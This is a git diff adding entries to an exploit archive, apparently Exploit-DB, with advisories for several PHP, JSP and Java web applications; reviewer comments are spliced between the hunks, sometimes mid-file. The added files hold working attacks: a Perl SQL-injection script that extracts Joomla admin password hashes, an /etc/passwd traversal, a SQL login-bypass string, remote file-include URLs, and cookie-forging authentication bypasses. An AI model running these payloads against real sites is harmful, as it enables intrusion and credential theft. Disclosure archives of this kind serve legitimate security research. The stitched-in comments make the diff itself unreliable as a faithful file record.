diff --git a/files.csv b/files.csv
index f1610308f..d085e52fd 100755
--- a/files.csv
+++ b/files.csv
@@ -30335,3 +30335,20 @@ id,file,description,date,author,platform,type,port
 33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
+33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
+33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
+33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
+33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
+33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
+33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
+33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0
+33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0
+33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0
+33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0
+33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0
+33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 'loyalty_enu/start.swe' Cross Site Scripting Vulnerability",2010-03-01,Lament,multiple,remote,0
+33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include Vulnerability",2010-03-01,"pratul agrawal",php,webapps,0
+33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 'girisyap.php' SQL Injection Vulnerability",2010-03-01,"cr4wl3r ",php,webapps,0
+33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
+33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
+33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
diff --git a/platforms/java/webapps/33687.txt b/platforms/java/webapps/33687.txt
new file mode 100755
index 000000000..aa2f688f6
--- /dev/null
+++ b/platforms/java/webapps/33687.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38483/info
+
+Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+
+http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/Login/">
+http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/">
diff --git a/platforms/jsp/webapps/33675.txt b/platforms/jsp/webapps/33675.txt
new file mode 100755
index 000000000..3193cd6ce
--- /dev/null
+++ b/platforms/jsp/webapps/33675.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38412/info
+
+Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects IBM Lotus Web Content Management, WebSphere Portal, and Lotus Quickr.
+
+
+http://www.example.com/wps/wcm/webinterface/login/login.jsp?";>
\ No newline at end of file
diff --git a/platforms/multiple/remote/33686.txt b/platforms/multiple/remote/33686.txt
new file mode 100755
index 000000000..b0a28b8af
--- /dev/null
+++ b/platforms/multiple/remote/33686.txt
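Review bot: The author field on the new files.csv rows 33680 and 33684 is `"cr4wl3r "` with a trailing space inside the quotes, so an exact-match lookup or group-by on author will not fold these rows together with entries recorded as `cr4wl3r`; write it as `"cr4wl3r"`. The description for row 33676 says `Newbie CMS 0.0.2`, while the advisory text added in the same commit says versions prior to `0.03` are vulnerable, so the two version strings should be reconciled against the source advisory. Rows 33667 and 33668 spell the product `Wordpress`; `WordPress` is the vendor's spelling and keeps title searches consistent.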
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38481/info
+
+IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Lotus Domino 7.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33667.txt b/platforms/php/webapps/33667.txt
new file mode 100755
index 000000000..6972df936
--- /dev/null
+++ b/platforms/php/webapps/33667.txt
@@ -0,0 +1,24 @@
+[+] Post Local File Disclosure in wordpress theme Elegance
+[+] Date: 07/06/2014
+[+] CWE Number: CWE-98
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Dork:inurl:"/wp-content/themes/elegance/"
+[+] Vendor Homepage: http://www.elegantthemes.com/
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: dl-skin.php
+
+[+] Exploit :
+
+
+
+
+Download:
+
+
+
+
+
+
+eof
\ No newline at end of file
diff --git a/platforms/php/webapps/33668.txt b/platforms/php/webapps/33668.txt
new file mode 100755
index 000000000..16551e6a1
--- /dev/null
+++ b/platforms/php/webapps/33668.txt
@@ -0,0 +1,32 @@
+[+] Post Local File Disclosure in wordpress theme Infocus
+
+[+] Date: 07/06/2014
+
+[+] CWE Number: CWE-98
+
+[+] Risk: High
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Dork:inurl:"/wp-content/themes/infocus/"
+
+[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Linux
+
+[+] Vulnerable File: dl-skin.php
+
+[+] Exploit :
+
+
+
+
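Review bot: `CWE Number: CWE-98` in the header of 33667.txt does not match the title: CWE-98 is the PHP include/require file-inclusion class, whereas a "Local File Disclosure" through a download script such as `dl-skin.php` is normally recorded as CWE-22 (path traversal), assuming the script reads and returns the file rather than including it, which the PoC markup visible here does not show. The same header is repeated in 33668.txt. Both entries also omit the affected theme version and any fix, and `Date: 07/06/2014` is ambiguous between day-first and month-first (files.csv records 2014-06-08); an ISO date and a line such as `[+] Affected Version: <not stated in advisory>` would make triage easier. For defenders the header already names the file to look for, so requests to `dl-skin.php` under `/wp-content/themes/` are what to search for in access logs, and the fix belongs in that script: canonicalise the requested path and restrict it to an allow-listed directory.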
+Download:
+
+
+
+
+
+eof
\ No newline at end of file
diff --git a/platforms/php/webapps/33671.txt b/platforms/php/webapps/33671.txt
new file mode 100755
index 000000000..935cbbf93
--- /dev/null
+++ b/platforms/php/webapps/33671.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/38385/info
+
+MySmartBB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect MySmartBB 1.7.0; other versions may also be affected.
+
+http://www.example.com/MySBB/misc.php/>'>
+http://www.example.com/MySBB/index.php/>'>
+http://www.example.com/memberlist.php/>'>
+http://www.example.com/MySBB/new.php/>'>
+http://www.example.com/MySBB/pm.php/>'>
+http://www.example.com/MySBB/register.php/>'>
+http://www.example.com/MySBB/search.php/>'>
\ No newline at end of file
diff --git a/platforms/php/webapps/33673.pl b/platforms/php/webapps/33673.pl
new file mode 100755
index 000000000..ace18677f
--- /dev/null
+++ b/platforms/php/webapps/33673.pl
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/38401/info
+
+The HD FLV Player component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl -w
+
+###############################################################################################
+#
+# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
+# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
+# [~] Homepage : http://www.indonesiancoder.com
+# [~] Date : 15 February, 2010
+#
+###############################################################################################
+#
+# [ Software Information ]
+#
+# [+] Vendor : http://www.hdflvplayer.net/
+# [+] Price : $ 99.00
+# [+] Vulnerability : SQL injection
+# [+] Dork : inurl:"CIHUY"
+# [+] Type : commercial
+#
+###############################################################################################
+#
+# USAGE : perl kaMz.pl
+#
+###############################################################################################
+
+print "\t\t[!]=========================================================[!]\n\n";
+print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
+print "\t\t[!]=========================================================[!]\n\n";
+print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
+print "\t\t [~] by kaMtiEz [~] \n\n";
+print "\t\t[!]=========================================================[!]\n\n";
+
+use LWP::UserAgent;
+
+print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
+chomp(my $IBL13Z=);
+
+$kaMtiEz="concat(username,0x3a,password)";
+$tukulesto="jos_users";
+$pathloader="com_hdflvplayer";
+
+$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
+$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
+$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
+print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
+}
+else{print "\n[+] Exploit GAGAL GAN ![+]\n";
+}
+
+##############################################################################################
+#
+# GREETZZZZZ :
+#
+# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
+# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
+# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
+# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
+#
+##############################################################################################
diff --git a/platforms/php/webapps/33674.txt b/platforms/php/webapps/33674.txt
new file mode 100755
index 000000000..b906e1037
--- /dev/null
+++ b/platforms/php/webapps/33674.txt
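Review bot: The header of 33673.pl names no affected version and no fix, unlike the sibling advisories in this commit that state which release is vulnerable, so a defender cannot tell from the entry which com_hdflvplayer installs to triage; a line such as `# [+] Affected : <version not stated in source advisory>` in the Software Information block would close that gap. The description attributes the flaw to unsanitised input reaching an SQL query, and the script shows that input is the `id` parameter of `index.php?option=com_hdflvplayer`; the matching remediation is to cast `id` to an integer or bind it as a query parameter in the component. For detection, requests carrying `option=com_hdflvplayer` together with `UNION` and `SELECT` in `id` are the pattern to match in web-server logs or WAF rules, rather than the script's User-Agent string, which is a generic browser value.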
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/38402/info
+
+OpenInferno OI.Blogs is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/templates/loadStyles.php?theme=file%00
+http://www.example.com/sources/javascript/loadScripts.php?scripts=[file]%00
+
+The following example data is available:
+
+javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'
\ No newline at end of file
diff --git a/platforms/php/webapps/33676.txt b/platforms/php/webapps/33676.txt
new file mode 100755
index 000000000..f13ea371e
--- /dev/null
+++ b/platforms/php/webapps/33676.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38421/info
+
+Newbie CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+Versions prior to Newbie CMS 0.03 are vulnerable; other versions may also be affected.
+
+Supplying the following cookie data is sufficient to exploit this issue:
+
+javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/";
\ No newline at end of file
diff --git a/platforms/php/webapps/33679.txt b/platforms/php/webapps/33679.txt
new file mode 100755
index 000000000..caa4f1461
--- /dev/null
+++ b/platforms/php/webapps/33679.txt
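Review bot: In 33676.txt the affected range reads "Versions prior to Newbie CMS 0.03", while the files.csv row added in this commit calls the product `Newbie CMS 0.0.2`; `0.03` looks like a typo for `0.0.3` and should be checked against the source advisory. The text also stops at the cookie value without stating the root cause in terms a maintainer can act on: as described, the admin area accepts a client-set `nb_logged` cookie as proof of login. A closing line such as `Fix: derive login state from a server-side session, never from a client-writable cookie value` would make the entry usable for remediation.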
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38445/info
+
+TRUC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+TRUC 0.11.0 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/truc/login_reset_password_page.php?failed=true&error=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33680.txt b/platforms/php/webapps/33680.txt
new file mode 100755
index 000000000..0b40ccbba
--- /dev/null
+++ b/platforms/php/webapps/33680.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38449/info
+
+Open Educational System is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+
+Open Educational System 0.1 beta and prior versions are vulnerable.
+
+http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site
\ No newline at end of file
diff --git a/platforms/php/webapps/33681.txt b/platforms/php/webapps/33681.txt
new file mode 100755
index 000000000..b63bf7f16
--- /dev/null
+++ b/platforms/php/webapps/33681.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38453/info
+
+SLAED CMS is prone to an unauthorized-access vulnerability.
+
+Attackers can exploit this issue to obtain unauthorized access to installation scripts.
+
+SLAED CMS 4 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/sd/setup.php?op=language&lang=1
+
+http://www.example.com/sd/install/index.php?op=language&lang=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33683.txt b/platforms/php/webapps/33683.txt
new file mode 100755
index 000000000..ab490bd04
--- /dev/null
+++ b/platforms/php/webapps/33683.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38461/info
+
+Article Friendly is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Article Friendly Pro is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/33684.txt b/platforms/php/webapps/33684.txt
new file mode 100755
index 000000000..dc12abdf9
--- /dev/null
+++ b/platforms/php/webapps/33684.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38465/info
+
+Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Blax Blog 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/girisyap.php
+
+Username: ' or '1=1
+password: ' or '1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33685.html b/platforms/php/webapps/33685.html
new file mode 100755
index 000000000..55715120a
--- /dev/null
+++ b/platforms/php/webapps/33685.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38469/info
+
+DeDeCMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input.
+
+Attackers can exploit this issue to gain unauthorized access to the affected application.
+
+DeDeCMS GBK 5.5 is vulnerable; other versions may also be affected.
+
+
U R L:   Path:
File: (Filetype must be GIF/JPEG etc)        RenameTo:
 





dedecms 0day exp..
need: session.auto_start = 1
By toby57 2010/2/22
\ No newline at end of file
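Review bot: The precondition for 33685.html appears only in the trailing line `need: session.auto_start = 1`, after the proof-of-concept form, and the prose header never mentions it, so a reader triaging from the summary cannot judge exposure. State it in the header, e.g. `Precondition: PHP session.auto_start = 1 (PHP's default is 0)`. The title's `_SESSION[dede_admin_id]` parameter suggests that request input can overwrite session variables once a session is open; that is inferred from the title, not shown in the hunk. On that reading the defensive checks are to confirm `session.auto_start = 0` in php.ini and to make sure request parameters are never imported into `$_SESSION`. The file also carries an `.html` extension but opens with plain-text advisory lines, which a browser will render as body text.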